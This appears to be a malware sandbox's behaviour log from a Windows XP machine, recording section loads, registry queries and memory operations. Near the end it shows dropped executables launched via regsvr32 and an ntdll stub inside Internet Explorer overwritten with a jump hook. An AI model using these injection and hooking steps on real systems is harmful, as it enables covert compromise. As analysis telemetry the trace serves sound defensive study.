Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1347584 Protection: execute Mapped to pid: own pid success or wait 2517994003
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1347584 Protection: readonly Mapped to pid: own pid success or wait 2517998972
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 1347584 Protection: execute Mapped to pid: own pid success or wait 2518030456
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Multimedia.api Access: query and read Type: commit Baseaddress: 7830000 Size: 1347584 Protection: readonly Mapped to pid: own pid success or wait 2518033970
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2518040683
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: query and read Type: commit Baseaddress: 7830000 Size: 401408 Protection: readonly Mapped to pid: own pid success or wait 2518046009
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2518053061
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PDDom.api Access: query and read Type: commit Baseaddress: 7830000 Size: 401408 Protection: readonly Mapped to pid: own pid success or wait 2518057043
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 5771264 Protection: execute Mapped to pid: own pid success or wait 2518061691
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: query and read Type: commit Baseaddress: 7830000 Size: 5771264 Protection: readonly Mapped to pid: own pid success or wait 2518066722
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 5771264 Protection: execute Mapped to pid: own pid success or wait 2518161404
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\PPKLite.api Access: query and read Type: commit Baseaddress: 7830000 Size: 5771264 Protection: readonly Mapped to pid: own pid success or wait 2518165250
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2518181963
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: query and read Type: commit Baseaddress: 7000000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 2518186824
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2518192413
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\ReadOutLoud.api Access: query and read Type: commit Baseaddress: 7000000 Size: 110592 Protection: readonly Mapped to pid: own pid success or wait 2518195886
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 364544 Protection: execute Mapped to pid: own pid success or wait 2518199983
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: query and read Type: commit Baseaddress: 7830000 Size: 364544 Protection: readonly Mapped to pid: own pid success or wait 2518205154
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 364544 Protection: execute Mapped to pid: own pid success or wait 2518217593
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\reflow.api Access: query and read Type: commit Baseaddress: 7830000 Size: 364544 Protection: readonly Mapped to pid: own pid success or wait 2518221074
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 303104 Protection: execute Mapped to pid: own pid success or wait 2518225630
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: query and read Type: commit Baseaddress: 7830000 Size: 303104 Protection: readonly Mapped to pid: own pid success or wait 2518230528
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 303104 Protection: execute Mapped to pid: own pid success or wait 2518237455
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SaveAsRTF.api Access: query and read Type: commit Baseaddress: 7830000 Size: 303104 Protection: readonly Mapped to pid: own pid success or wait 2518240955
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2518245386
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2518250344
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 356352 Protection: execute Mapped to pid: own pid success or wait 2518258447
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search.api Access: query and read Type: commit Baseaddress: 7830000 Size: 356352 Protection: readonly Mapped to pid: own pid success or wait 2518261876
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2518265837
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2518271422
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 2518276745
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Search5.api Access: query and read Type: commit Baseaddress: 7000000 Size: 86016 Protection: readonly Mapped to pid: own pid success or wait 2518280196
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2518284112
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2518289044
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2518294683
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\SendMail.api Access: query and read Type: commit Baseaddress: 7000000 Size: 126976 Protection: readonly Mapped to pid: own pid success or wait 2518298130
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 270336 Protection: execute Mapped to pid: own pid success or wait 2518302119
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: query and read Type: commit Baseaddress: 7830000 Size: 270336 Protection: readonly Mapped to pid: own pid success or wait 2518307472
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: write and read and execute Type: commit Baseaddress: 7830000 Size: 270336 Protection: execute Mapped to pid: own pid success or wait 2518313917
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Spelling.api Access: query and read Type: commit Baseaddress: 7830000 Size: 270336 Protection: readonly Mapped to pid: own pid success or wait 2518317424
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 167936 Protection: execute Mapped to pid: own pid success or wait 2518321768
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: query and read Type: commit Baseaddress: 7000000 Size: 167936 Protection: readonly Mapped to pid: own pid success or wait 2518327696
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 167936 Protection: execute Mapped to pid: own pid success or wait 2518333412
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\Updater.api Access: query and read Type: commit Baseaddress: 7000000 Size: 167936 Protection: readonly Mapped to pid: own pid success or wait 2518336810
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 184320 Protection: execute Mapped to pid: own pid success or wait 2518340952
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: query and read Type: commit Baseaddress: 7000000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2518346169
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 184320 Protection: execute Mapped to pid: own pid success or wait 2518353533
Section loaded Path: C:\Program Files\Adobe\Reader 8.0\Reader\plug_ins\weblink.api Access: query and read Type: commit Baseaddress: 7000000 Size: 184320 Protection: readonly Mapped to pid: own pid success or wait 2518356989
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadco.dll Access: write and read and execute Type: commit Baseaddress: 7000000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2518535083
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadco.dll Access: query and write and read and execute Type: image Baseaddress: 4DDF0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2518541123
Section loaded Path: \KnownDlls\MSDART.DLL Access: write and read and execute Type: unknown Baseaddress: 4DDF0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2518565019
Section loaded Path: C:\WINDOWS\system32\msdart.dll Access: query and write and read and execute Type: image Baseaddress: 765B0000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2518568278
Section loaded Path: \KnownDlls\comdlg32.dll Access: write and read and execute Type: unknown Baseaddress: 763B0000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2518678899
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadco.dll Access: query and read Type: commit Baseaddress: 7000000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2518857475
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadcor.dll Access: write and read and execute Type: commit Baseaddress: 7010000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2518868908
Section loaded Path: C:\Program Files\Common Files\System\msadc\msadcor.dll Access: query and write and read and execute Type: image Baseaddress: 7010000 Size: 16384 Protection: read write Mapped to pid: own pid conflicting addresses 2518874158
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 100b8, 100b6, 1, 64415c73, 696e696d, 61727473, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2519325688
Section loaded Path: \BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520807080
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB..AJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520863969
Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.ABH Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7D30000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 2520888532
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.B.AJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520889622
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.C.AJGKK Access: query and write and read Type: commit Baseaddress: 7DB0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520890686
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.D.AJGKK Access: query and write and read Type: commit Baseaddress: 7DC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520891685
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.E.PJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520904912
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.F.PJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520921425
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MMB.G.PJGKK Access: query and write and read Type: commit Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520924734
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.LB.PJGKK Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520928390
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.MB.PJGKK Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520929338
Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ABH.NB.PJGKK Access: query and write and read and execute and extend size Type: unknown Baseaddress: 7020000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2520930237
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 7DB0000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 2522559365
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D4C0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2522595702
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 7FB0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2530307854
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1C0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2530313645
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531215611
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531241094
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531250072
Section loaded Path: C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE Access: query and read Type: commit Baseaddress: 81B0000 Size: 10084352 Protection: readonly Mapped to pid: own pid success or wait 2531264020
Section loaded Path: \BaseNamedObjects\Global\RotHintTable Access: read Type: unknown Baseaddress: 7FD0000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2531296618
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2532499209
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535090595
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 Access: write Type: unknown Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 2535107362
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120120111202_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2535107629
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FF0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535108386
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535133895
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535135762
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120220111203_index.dat_32768 Access: write Type: unknown Baseaddress: 7FE0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2535287586
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 Access: write Type: unknown Baseaddress: 7FE0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2535337426
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 7FF0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2535337695
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 Access: write Type: unknown Baseaddress: 7FF0000 Size: 16384 Protection: read write Mapped to pid: own pid object name not found 2535340312
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011112820111205_index.dat_32768 Access: query and write and read Type: commit Baseaddress: 7FF0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2535340587
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535341451
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535402985
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535404088
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 Access: write Type: unknown Baseaddress: 7FE0000 Size: 4096 Protection: read write Mapped to pid: own pid object name not found 2535562030
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_16384 Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2535562282
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 Access: write Type: unknown Baseaddress: 7FE0000 Size: 16384 Protection: read write Mapped to pid: own pid object name not found 2535565316
Section loaded Path: \BaseNamedObjects\C:_Documents and Settings_Administrator_Local Settings_History_History.IE5_MSHist012011120820111209_index.dat_32768 Access: query and write and read Type: commit Baseaddress: 7FE0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2535565569
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535569460
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535572587
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535574751
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535575780
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535576801
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535581419
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2535582364
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535583296
Section loaded Path: \BaseNamedObjects\ASMWIN0 Access: write and read Type: unknown Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535599011
Section loaded Path: \BaseNamedObjects\ASMWIN1 Access: write and read Type: unknown Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2535740662
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2536085947
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2536087225
Section loaded Path: unknown Access: query and write and read Type: commit Baseaddress: 8000000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2536088489
Section loaded Path: \BaseNamedObjects\ASMWIN2 Access: write and read Type: unknown Baseaddress: 8000000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 2539074747
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 8000000 Size: 40960 Protection: execute Mapped to pid: own pid success or wait 2552457412
Section loaded Path: C:\Program Files\Java\jre1.5.0_01\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D4E0000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2552510265
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 6D4E0000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2570565069
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8100000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2570842702
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2570919162
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 8100000 Size: 258048 Protection: readonly Mapped to pid: own pid success or wait 2573692538
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8100000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2573725726
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8230000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2573812480
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8230000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2573818352
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8240000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2574174144
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8230000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2574185916
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2574194589
Section loaded Path: C:\Documents and Settings\Administrator\Desktop\0.3635417184612467.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid invalid file for section 2579839292
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and write and read and execute and extend size Type: image Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2579857381
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8100000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2579859301
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8230000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2579884425
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8230000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2579889032
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: write and read and execute Type: commit Baseaddress: 8230000 Size: 12288 Protection: execute Mapped to pid: own pid success or wait 2579892551
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2579895836
Section loaded Path: C:\WINDOWS\system32\regsvr32.exe Access: query and read Type: commit Baseaddress: 8100000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2579904336
Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.MMB Access: query and write and read Type: reserve Baseaddress: 8100000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 2584466359
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 1CC HWNDs: 3011a, 30114, 1, 901aa, 5015c, 50174, 5015e, 3016e, 1, 5c726f74, 6c707041, 74616369, 206e6f69, 61746144, 796b535c success or wait 2584529778
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8080000 Length: 807F8C8 Allocation Type: null Protection: page read and write success or wait 2654590104
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8080000 Length: 807F8CC Allocation Type: null Protection: page read and write success or wait 2654590391
File opened Path: C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2658025341
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: Enabled object name not found 2658027591
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: EnabledV8 success or wait 2658028174
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: CleanCookies success or wait 2658028732
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: CleanCookies success or wait 2658029293
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658029977
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658030568
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658031152
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658031731
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658032317
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658032893
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658033477
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658034059
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1406 success or wait 2658034646
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\EXCEL.EXE\shell Name: 1609 success or wait 2658035223
Memory allocated PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190000 Length: 807F4C0 Allocation Type: null Protection: page execute and read and write success or wait 2658035884
Memory attributes changed PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2658039511
Memory read PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2658039873
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 8190000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 77 74 success or wait 2658040850
Memory written PID: 1712 Path: C:\Program Files\Internet Explorer\iexplore.exe Base: 7C90D1AE Length: 5 Value: E9 A4 AE 70 8B success or wait 2658041850
